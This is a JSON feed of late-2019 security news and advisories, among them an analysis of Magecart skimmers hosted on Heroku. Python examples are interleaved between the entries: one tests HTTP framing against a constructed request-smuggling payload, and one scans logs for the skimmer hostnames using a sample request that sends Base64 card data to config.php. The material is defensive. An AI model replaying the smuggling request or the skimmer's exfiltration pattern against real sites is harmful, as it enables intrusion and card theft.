Just a fraction (8 percent) plan to reduce investment, while around a third (30 percent) plan to maintain their budget at the 2019 level.\n\nOnce again, larger SMBs trend slightly differently from their compatriots. Three-quarters (75 percent) of those with between 49 and 149 employees said they plan to increase their budget in 2020 and 17 percent plan to maintain their 2019 budget. Among SMBs with 150-250 employees, 81 percent plan to increase their budget in 2020 and just 10 percent plan to maintain their 2019 levels.\n\nIn all data sets, just a fraction (8 to 9 percent) plan to reduce their spending; these companies largely fall into the nonprofit (48 percent) and hospitality (47 percent) sectors.\n\nThe report found that the verticals most likely to increase cybersecurity budgets in 2020 include technology and telecom (77 percent), government (76 percent), manufacturing (73 percent) and financial services/insurance (71 percent).\n", "modified": "2019-12-04T22:11:18", "published": "2019-12-04T22:11:18", "id": "THREATPOST:6EE19A47D59980173B7DD35FE52580E2", "href": "https://threatpost.com/smbs-nation-state-actors-apts-targeting/150836/", "type": "threatpost", "title": "ThreatList: 90% SMBs Believe Nation-State Actors Are Targeting Them", "cvss": {"score": 0.0, "vector": "NONE"}}], "schneier": [{"lastseen": "2019-12-05T12:26:36", "bulletinFamily": "blog", "description": "Interesting [story](<https://www.nytimes.com/2019/11/30/us/politics/pennsylvania-voting-machines.html>) of a flawed computer voting machine and a paper ballot available for recount. All ended well, but only because of that paper backup.\n\n> Vote totals in a Northampton County judge's race showed one candidate, Abe Kassis, a Democrat, had just 164 votes out of 55,000 ballots across more than 100 precincts. Some machines reported zero votes for him. In a county with the ability to vote for a straight-party ticket, one candidate's zero votes was a near statistical impossibility. Something had gone quite wrong.\n\nBoing Boing [post](<https://boingboing.net/2019/12/02/the-electronic-votes-said-he-l.html>).", "modified": "2019-12-05T12:06:57", "published": "2019-12-05T12:06:57", "id": "SCHNEIER:1C2F1631670162418050016701273C8F", "href": "https://www.schneier.com/blog/archives/2019/12/election_machin_2.html", "type": "schneier", "title": "Election Machine Insecurity Story", "cvss": {"score": 0.0, "vector": "NONE"}}], "f5": [{"lastseen": "2019-12-06T17:26:46", "bulletinFamily": "software", "description": "F5 Product Development has assigned ID 856961 (BIG-IP) to this vulnerability.\n\nTo determine if your product and version have been evaluated for this vulnerability, refer to the **Applies to (see versions)** box. 
To determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases, point releases, or hotfixes that address the vulnerability, refer to the following table. For more information about security advisory versioning, refer to [K51812227: Understanding Security Advisory versioning](<https://support.f5.com/csp/article/K51812227>).\n\nProduct | Branch | Versions known to be vulnerable | Fixes introduced in | Severity | CVSSv3 score\u00b9 | Vulnerable component or feature \n---|---|---|---|---|---|--- \nBIG-IP (LTM, AAM, AFM, Analytics, APM, ASM, DNS, FPS, GTM, Link Controller, PEM) | 15.x | 15.0.0 - 15.0.1 | None | Medium | [6.5](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H>) | Linux Kernel (BaseOS) \nBIG-IP (LTM, AAM, AFM, Analytics, APM, ASM, DNS, FPS, GTM, Link Controller, PEM) | 14.x | 14.1.0 - 14.1.2 | None | Medium | [6.5](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H>) | Linux Kernel (BaseOS) \nBIG-IP (LTM, AAM, AFM, Analytics, APM, ASM, DNS, FPS, GTM, Link Controller, PEM) | 13.x | 13.1.0 - 13.1.3 | None | Medium | [6.5](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H>) | Linux Kernel (BaseOS) \nBIG-IP (LTM, AAM, AFM, Analytics, APM, ASM, DNS, FPS, GTM, Link Controller, PEM) | 12.x | 12.1.0 - 12.1.5 | None | Medium | [6.5](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H>) | Linux Kernel (BaseOS) \nBIG-IP (LTM, AAM, AFM, Analytics, APM, ASM, DNS, FPS, GTM, Link Controller, PEM) | 11.x | 11.5.2 - 11.6.5 | None | Medium | [6.5](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H>) | Linux Kernel (BaseOS) \nEnterprise Manager | 3.x | 3.1.1 | None | Medium | [6.5](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H>) | Linux Kernel (BaseOS) \nBIG-IQ Centralized Management | 7.x | 7.0.0 | None | Medium | [6.5](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H>) | Linux Kernel (BaseOS) \nBIG-IQ Centralized Management | 6.x | 6.0.0 - 6.1.0 | None | Medium | [6.5](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H>) | Linux Kernel (BaseOS) \nBIG-IQ Centralized Management | 5.x | 5.2.0 - 5.4.0 | None | Medium | [6.5](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H>) | Linux Kernel (BaseOS) \nTraffix SDC | 5.x | None | Not applicable | Not vulnerable | None | None \n\n\u00b9The CVSSv3 score link takes you to a resource outside of AskF5, and it is possible that the document may be removed without our knowledge.\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Fixes introduced in** column. 
If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nMitigation\n\nTo mitigate this vulnerability, you can secure access to the BIG-IP system so that only trusted users have access to the system, and avoid installing kernel modules whose authenticity is unknown on the BIG-IP system. For more information on securing access to the BIG-IP system, refer to [K13092: Overview of securing access to the BIG-IP system](<https://support.f5.com/csp/article/K13092>).\n\n * [K51812227: Understanding Security Advisory versioning](<https://support.f5.com/csp/article/K51812227>)\n * [K41942608: Overview of Security Advisory articles](<https://support.f5.com/csp/article/K41942608>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K9502: BIG-IP hotfix and point release matrix](<https://support.f5.com/csp/article/K9502>)\n * [K13123: Managing BIG-IP product hotfixes (11.x - 15.x)](<https://support.f5.com/csp/article/K13123>)\n * [K15106: Managing BIG-IQ product hotfixes](<https://support.f5.com/csp/article/K15106>)\n * [K15113: BIG-IQ hotfix and point release matrix](<https://support.f5.com/csp/article/K15113>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n", "modified": "2019-12-05T02:55:00", "published": "2019-12-05T02:55:00", "id": "F5:K17269881", "href": "https://support.f5.com/csp/article/K17269881", "title": "Intel MCE vulnerability CVE-2018-12207", "type": "f5", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}], "suse": [{"lastseen": "2019-12-05T03:26:47", "bulletinFamily": "unix", "description": "This update for haproxy to version 2.0.10 fixes the following issues:\n\n HAProxy was updated to 2.0.10\n\n Security issues fixed:\n\n - CVE-2019-18277: Fixed potential HTTP request smuggling in messages whose\n Transfer-Encoding header did not contain \"chunked\" (bsc#1154980).\n - Fixed improper handling of headers that allowed LF characters to be\n injected in H2-to-H1 transfers, opening new attack surface (bsc#1157712).\n - Fixed an issue where HEADERS frames on idle streams were not rejected, so\n that HAProxy crashed while trying to decode them (bsc#1157714).\n\n Other issue addressed:\n\n - Macro change in the spec file (bsc#1082318)\n\n More information regarding the release at:\n http://git.haproxy.org/?p=haproxy-2.0.git;a=commit;h=ac198b92d461515551b95daae20954b3053ce87e\n\n This update was imported from the SUSE:SLE-15-SP1:Update update project.\n\n", "modified": "2019-12-05T00:15:11", "published": "2019-12-05T00:15:11", "id": "OPENSUSE-SU-2019:2645-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2019-12/msg00019.html", "title": "Security update for haproxy (important)", "type": "suse", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "cloudfoundry": [{"lastseen": "2019-12-06T03:52:35", "bulletinFamily": "software", "description": "## Severity\n\nLow\n\n## Vendor\n\nCanonical Ubuntu\n\n## Versions Affected\n\n * Canonical Ubuntu 18.04\n\n## Description\n\nIt was discovered that DjVuLibre incorrectly handled certain memory operations. 
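The CVE-2019-18277 entry in the haproxy update above is about message framing: a request that carries a Transfer-Encoding header without a final "chunked" coding has no well-defined length, and a proxy that quietly falls back to Content-Length can disagree with the server behind it about where one request ends and the next begins. The following is an added example, not HAProxy code, that puts the lenient framing described in the advisory beside the strict RFC 7230 section 3.3.3 rule on the same constructed request; the request bytes, the `shop.example` host and the demo function are all constructed for illustration.

```python
"""Strict vs lenient HTTP/1.1 request framing (RFC 7230, section 3.3.3).

Added example, not HAProxy code: it shows why a message carrying a
Transfer-Encoding header that does not end in 'chunked' must be rejected
instead of being framed by Content-Length. The raw request is constructed."""


class FramingError(Exception):
    """Message length cannot be determined safely; a server answers 400."""


def parse_head(raw):
    """Return (request_line, [(lower_name, value), ...], remaining_bytes)."""
    head, sep, rest = raw.partition(b"\r\n\r\n")
    if not sep:
        raise FramingError("incomplete head")
    lines = head.split(b"\r\n")
    headers = []
    for line in lines[1:]:
        name, colon, value = line.partition(b":")
        # Reject 'Transfer-Encoding : chunked' style whitespace games outright.
        if not colon or not name or name != name.strip():
            raise FramingError("malformed header line")
        headers.append((name.lower(), value.strip()))
    return lines[0], headers, rest


def body_framing_strict(headers):
    """Return 'chunked' or an int Content-Length, or raise FramingError."""
    te = [v for n, v in headers if n == b"transfer-encoding"]
    cl = [v for n, v in headers if n == b"content-length"]
    if te:
        if cl:
            # RFC 7230 lets TE win, but an intermediary should not forward a
            # message that two parsers may frame differently.
            raise FramingError("Transfer-Encoding and Content-Length both present")
        codings = [c.strip().lower() for v in te for c in v.split(b",")]
        if codings[-1] != b"chunked":
            # With no final chunked coding the request length is unknowable.
            raise FramingError("Transfer-Encoding without final chunked")
        return "chunked"
    if cl:
        if len(set(cl)) != 1 or not cl[0].isdigit():
            raise FramingError("conflicting or non-numeric Content-Length")
        return int(cl[0])
    return 0


def body_framing_lenient(headers):
    """The pre-fix behaviour the advisory describes: a Transfer-Encoding
    header lacking 'chunked' is ignored and Content-Length is trusted."""
    te = [v for n, v in headers if n == b"transfer-encoding"]
    cl = [v for n, v in headers if n == b"content-length"]
    if any(b"chunked" in v.lower() for v in te):
        return "chunked"
    return int(cl[0]) if cl else 0


def split_requests(raw, framer):
    """Frame back-to-back non-chunked requests on one connection with `framer`."""
    out = []
    while raw:
        req_line, headers, rest = parse_head(raw)
        length = framer(headers)
        if length == "chunked":
            raise FramingError("chunked decoding is outside this demo")
        out.append((req_line, rest[:length]))
        raw = rest[length:]
    return out


def framing_or_error(framer, headers):
    """Helper for callers that want a value instead of an exception."""
    try:
        return ("ok", framer(headers))
    except FramingError as exc:
        return ("error", str(exc))


# Constructed: Content-Length says the body is 4 bytes, while a peer honouring
# Transfer-Encoding: identity would read to connection close and swallow the
# GET as body. The two sides disagree on where the first request ends.
SMUGGLE_ATTEMPT = (
    b"POST /cart HTTP/1.1\r\nHost: shop.example\r\n"
    b"Content-Length: 4\r\nTransfer-Encoding: identity\r\n\r\n"
    b"AAAA"
    b"GET /admin HTTP/1.1\r\nHost: shop.example\r\n\r\n"
)


def demo():
    """Return (what the lenient parser forwards, why the strict one refuses)."""
    lenient = split_requests(SMUGGLE_ATTEMPT, body_framing_lenient)
    try:
        split_requests(SMUGGLE_ATTEMPT, body_framing_strict)
        strict = None
    except FramingError as exc:
        strict = str(exc)
    return lenient, strict
```

The lenient parser forwards two requests (a 4-byte POST and a GET for /admin) where a peer that honours the Transfer-Encoding header sees only one; the strict parser refuses the message at the front door, which is the behaviour a fixed proxy should have.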
If a user or automated system were tricked into processing a specially crafted DjVu file, a remote attacker could cause applications to hang or crash, resulting in a denial of service, or possibly execute arbitrary code.\n\nCVEs contained in this USN include: CVE-2019-15142, CVE-2019-15143, CVE-2019-15144, CVE-2019-15145, CVE-2019-18804\n\n## Affected Cloud Foundry Products and Versions\n\n_Severity is low unless otherwise noted._\n\n * All versions of Cloud Foundry cflinuxfs3 prior to 0.146.0\n\n## Mitigation\n\nUsers of affected products are strongly encouraged to follow one of the mitigations below:\n\n * The Cloud Foundry project recommends that Cloud Foundry deployments run with cflinuxfs3 version 0.146.0 or later.\n\n## References\n\n * [USN-4198-1](<https://usn.ubuntu.com/4198-1>)\n * [CVE-2019-15142](<https://people.canonical.com/~ubuntu-security/cve/CVE-2019-15142>)\n * [CVE-2019-15143](<https://people.canonical.com/~ubuntu-security/cve/CVE-2019-15143>)\n * [CVE-2019-15144](<https://people.canonical.com/~ubuntu-security/cve/CVE-2019-15144>)\n * [CVE-2019-15145](<https://people.canonical.com/~ubuntu-security/cve/CVE-2019-15145>)\n * [CVE-2019-18804](<https://people.canonical.com/~ubuntu-security/cve/CVE-2019-18804>)\n", "modified": "2019-12-05T00:00:00", "published": "2019-12-05T00:00:00", "id": "CFOUNDRY:8A8925C48F7E405F9D6C927A2B352D79", "href": "https://www.cloudfoundry.org/blog/usn-4198-1/", "title": "USN-4198-1: DjVuLibre vulnerabilities | Cloud Foundry", "type": "cloudfoundry", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "ubuntu": [{"lastseen": "2019-12-05T21:06:43", "bulletinFamily": "unix", "description": "It was discovered that RabbitMQ incorrectly handled certain inputs. 
An attacker could possibly use this issue to execute arbitrary code.", "modified": "2019-12-05T00:00:00", "published": "2019-12-05T00:00:00", "id": "USN-4214-1", "href": "https://usn.ubuntu.com/4214-1/", "title": "RabbitMQ vulnerability", "type": "ubuntu", "cvss": {"score": 0.0, "vector": "NONE"}}], "oraclelinux": [{"lastseen": "2019-12-05T21:29:44", "bulletinFamily": "unix", "description": "docker-engine\n[19.03.1-1.0.0]\n- update to 19.03.1\n[19.03-0.0.1]\n- update to 19.03", "modified": "2019-12-05T00:00:00", "published": "2019-12-05T00:00:00", "id": "ELSA-2019-4827", "href": "http://linux.oracle.com/errata/ELSA-2019-4827.html", "title": "docker-engine docker-cli security update", "type": "oraclelinux", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "malwarebytes": [{"lastseen": "2019-12-04T16:34:48", "bulletinFamily": "blog", "description": "Criminals love to abuse legitimate services\u2014especially platform-as-a-service (PaaS) cloud providers\u2014as they are a popular and reliable hosting commodity used to support both business and consumer ventures.\n\nCase in point, in April 2019 we [documented](<https://blog.malwarebytes.com/cybercrime/2019/04/github-hosted-magecart-skimmer-used-against-hundreds-of-e-commerce-sites/>) a web skimmer served from the code repository GitHub. Later on in June, we [observed](<https://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/>) a vast campaign where skimming code was injected into Amazon S3 buckets.\n\nThis time, we take a look at a rash of skimmers found on [Heroku](<https://www.heroku.com/>), a container-based, cloud PaaS owned by Salesforce. Threat actors are leveraging the service not only to host their skimmer infrastructure, but also to collect stolen credit card data.\n\nAll instances of abuse found have already been reported to Heroku and taken down. 
We would like to thank the Salesforce Abuse Operations team for their swift response to our notification.\n\n### Abusing cloud apps for skimming\n\nDevelopers can leverage Heroku to build apps in a variety of languages and deploy them seamlessly at scale.\n\nHeroku has a freemium model, and new users can experiment with the platform's free web hosting services with certain limitations. The crooked part of the Magecart cabal was registering free accounts with Heroku to host its skimming business.\n\nTheir web skimming app consists of three components:\n\n * The core skimmer that is injected into compromised merchant sites, responsible for detecting the checkout URL and loading the next component.\n * A rogue iframe that overlays the standard payment form, meant to harvest the victim's credit card data.\n * The exfiltration mechanism that sends the stolen data back in encoded form.\n\n### iframe trick\n\nCompromised shopping sites are injected with a single line of code that loads the remote piece of JavaScript. Its goal is to monitor the current page and load a second element (a malicious credit card iframe) once the current browser URL contains _checkout_, a string the script carries Base64-encoded as _Y2hlY2tvdXQ=_.\n\nThe iframe is drawn above the standard payment form and looks identical to it, as the cybercriminals use the same cascading style sheet (CSS) from _portal.apsclicktopay.com/css/build/easypay.min.css_.\n\nFinally, the stolen data is exfiltrated, after which victims will receive an error message instructing them to reload the page. 
This may be because the form needs to be repopulated properly, without the iframe this time.\n\n### Several Heroku-hosted skimmers found\n\nThis is not the only instance of a credit card skimmer found on Heroku. We identified several others using the same naming convention for their script, all seemingly becoming active within the past week.\n\n> Another one on [@heroku](<https://twitter.com/heroku?ref_src=twsrc%5Etfw>)\n>\n> hxxps://stark-gorge-44782.herokuapp[.]com/integration.js. Fake form in an iframe. Data goes to hxxps://stark-gorge-44782.herokuapp[.]com/config.php?id= [pic.twitter.com/Xa1F2z1Z1a](<https://t.co/Xa1F2z1Z1a>)\n>\n> -- Denis (@unmaskparasites) [December 2, 2019](<https://twitter.com/unmaskparasites/status/1201625226704015367?ref_src=twsrc%5Etfw>)\n\nIn one case, the threat actors may have forgotten to use obfuscation. The code shows vanilla skimming: it looks for specific form fields, collects them and exfiltrates them encoded with _window.btoa(JSON.stringify(result))_.\n\nWe will likely continue to observe web skimmers abusing more cloud services, as they are a cheap (even free) commodity that can be discarded when no longer needed.\n\nFrom a detection standpoint, skimmers hosted on cloud providers may cause some issues with false positives. For example, one cannot blacklist a domain used by thousands of other legitimate users. 
However, in this case we can easily do fully qualified domain name (FQDN) detections and block just that malicious user.\n\n### Indicators of Compromise (IOCs)\n\n**Skimmer hostnames on Heroku**\n\nancient-savannah-86049[.]herokuapp[.]com \npure-peak-91770[.]herokuapp[.]com \naqueous-scrubland-51318[.]herokuapp[.]com \nstark-gorge-44782[.]herokuapp[.]com\n\nThe post [There's an app for that: web skimmers found on PaaS Heroku](<https://blog.malwarebytes.com/web-threats/2019/12/theres-an-app-for-that-web-skimmers-found-on-paas-heroku/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "modified": "2019-12-04T16:00:00", "published": "2019-12-04T16:00:00", "id": "MALWAREBYTES:13BFD465C522350F5BBAF4F876F3913D", "href": "https://blog.malwarebytes.com/web-threats/2019/12/theres-an-app-for-that-web-skimmers-found-on-paas-heroku/", "type": "malwarebytes", "title": "There\u2019s an app for that: web skimmers found on PaaS Heroku", "cvss": {"score": 0.0, "vector": "NONE"}}], "akamaiblog": [{"lastseen": "2019-12-04T20:29:37", "bulletinFamily": "blog", "description": "If you're anything like me, you have no interest in physically entering a store the day after Thanksgiving. I do, however, love to shop online in the comfort of my home. While many people start their holiday shopping on Black Friday, I go to my favorite online retailers a day or two early, add what I want to my shopping cart, and then wait for the 20% off discount to hit my email, so I can complete the purchase on my phone. Whether consumers were gift-buying or just waiting for sales, a lot of us were shopping on our phones on Black Friday.\n\nAs you might imagine, this past weekend was a busy one for Akamai's retail customers and its employees, working all hours of the day and night to ensure peak performance. 
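The Malwarebytes write-up above makes two points a detection engineer can act on: block on the attacker's full Heroku hostname rather than the shared herokuapp.com parent, and recognise the `btoa(JSON.stringify(result))` exfiltration format (and the Base64 `Y2hlY2tvdXQ=` trigger) when it shows up in traffic. The following is an added example, not Malwarebytes' code or the skimmer's: it runs the FQDN match and the payload decode over a constructed web-proxy log. The log format, the client address, the unrelated `calm-meadow-12345` app, the `shop.example` host and the card data (a well-known test number) are all constructed; only the four IOC hostnames come from the post.

```python
"""Hunt for Heroku-hosted skimmer traffic in web-proxy logs.

Added example, not Malwarebytes' code. It does two things the post describes:
blocks on the attacker's full hostname (FQDN) rather than the shared
herokuapp.com parent, and decodes the btoa(JSON.stringify(result)) payload
sent to config.php?id= so an analyst can see which fields were skimmed.
The proxy log format and card data below are constructed, not real traffic."""
import base64
import json
import re
from urllib.parse import parse_qs, quote, urlsplit

# IOC hostnames from the post, refanged for matching.
IOC_FQDNS = {
    "ancient-savannah-86049.herokuapp.com",
    "pure-peak-91770.herokuapp.com",
    "aqueous-scrubland-51318.herokuapp.com",
    "stark-gorge-44782.herokuapp.com",
}


def refang(host):
    """Turn the post's defanged 'x[.]y' notation back into a hostname."""
    return host.replace("[.]", ".")


def is_ioc_host(host, iocs=IOC_FQDNS):
    """True for an IOC FQDN or a subdomain of one, never for the bare
    herokuapp.com parent that thousands of legitimate apps share."""
    host = refang(host).lower().rstrip(".")
    return any(host == ioc or host.endswith("." + ioc) for ioc in iocs)


def decode_exfil(query):
    """Recover the field *names* from a btoa(JSON.stringify(obj)) blob passed
    as ?id=...; values are dropped so the result is safe to write to a ticket."""
    blob = parse_qs(query).get("id", [""])[0]
    if not blob:
        return None
    blob += "=" * (-len(blob) % 4)  # btoa pads, but tolerate a stripped '='
    try:
        obj = json.loads(base64.b64decode(blob))
    except ValueError:  # binascii.Error and JSONDecodeError both subclass it
        return None
    return sorted(obj) if isinstance(obj, dict) else None


def decode_trigger(b64):
    """The string the skimmer compares against the page URL (Y2hlY2tvdXQ=)."""
    return base64.b64decode(b64).decode()


LOG_RE = re.compile(r"^(\S+) (\S+) (\S+)$")


def scan_log(text):
    """Return one hit per request to an IOC host, with decoded exfil fields."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        client, _method, url = m.groups()
        parts = urlsplit(url)
        if not is_ioc_host(parts.hostname or ""):
            continue
        hits.append({"client": client, "host": parts.hostname, "path": parts.path,
                     "exfiltrated_fields": decode_exfil(parts.query)})
    return hits


# Constructed exfil payload in the format the post quotes; the card number is
# a well-known test number, not a real card.
_EXFIL = base64.b64encode(json.dumps(
    {"number": "4111111111111111", "cvv": "123", "exp": "12/25"},
    separators=(",", ":")).encode()).decode()

# Constructed proxy log: "<client> <method> <url>". Line 2 is an unrelated
# Heroku app that a domain-wide block would wrongly catch.
SAMPLE_LOG = f"""\
10.0.0.5 GET https://shop.example/checkout
10.0.0.5 GET https://calm-meadow-12345.herokuapp.com/app.js
10.0.0.5 GET https://stark-gorge-44782.herokuapp.com/integration.js
10.0.0.5 GET https://stark-gorge-44782.herokuapp.com/config.php?id={quote(_EXFIL, safe='')}
"""
```

Only the two requests to the IOC hostname are reported, the legitimate Heroku app on line 2 is untouched, and the second hit lists the field names (`cvv`, `exp`, `number`) without echoing the card values into the alert.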
At the same time, Akamai studies the data from its retail customers from all over the world, examining trends to optimize our solutions. The one trend that jumped out at me was all about mobile. Back in 2018, 57.55% of shoppers during the same period were on mobile devices. This year we saw that number jump to a whopping 62.9%. Here's why I think that is:\n\n * [EVERYONE has a mobile device](<https://www.gsma.com/mobilefordevelopment/wp-content/uploads/2019/07/GSMA-State-of-Mobile-Internet-Connectivity-Report-2019.pdf>). In some parts of the world, it's mobile-first or mobile-only. The US may have started Black Friday, but we've been seeing increases in online shopping all over the world on this shopping holiday.\n * [Loyalty programs make it easy to buy on your phone](<https://www.apptentive.com/blog/2019/06/18/how-major-brands-use-mobile-customer-loyalty-programs/>). If you already have an account, all your information is saved and it's just a few clicks to buy. You might even get free shipping for being loyal.\n * Etailers are getting much better at making mobile shopping easy and fast. [The performance of an online retailer's web site or app has to be exceptional](<https://www.bigcommerce.com/blog/ecommerce-ux/#how-to-stay-ahead-of-user-expectations>) for shopping and purchasing goods. One key to that is optimizing images and videos. I want to see that sweater in every angle, in every color and I want to see that lipstick on a curly-headed brunette. And I want to see it quickly. I am an online consumer and my expectations are very high.\n\nIf you think you can improve your customer engagement by optimizing your online presence, reach out to us. We are happy to help.\n\nBonus: Did you ever wonder about the origins of Black Friday? 
Our friends at the Telegraph recently published this[ interesting article](<https://www.telegraph.co.uk/black-friday/2019/11/29/black-friday-name-meaning-history-sales-event/>).\n\n_After evaluating the data of consumers for Cyber Monday, we noticed a unique trend with mobile traffic. In 2018, 37% of mobile conversions happened before 3 seconds, in 2019 that percentage increased to 51% before 3 seconds. Before 3 seconds! There is no denying that eTailers are making mobile purchasing easier and faster._\n\n", "modified": "2019-12-04T19:39:29", "published": "2019-12-04T14:30:00", "id": "AKAMAIBLOG:A5EA7E8213C90D7D67BE3E3A03C3244E", "href": "http://feedproxy.google.com/~r/TheAkamaiBlog/~3/hz16syTxBQI/black-friday-stays-mobile.html", "type": "akamaiblog", "title": "Black Friday Stays Mobile", "cvss": {"score": 0.0, "vector": "NONE"}}]}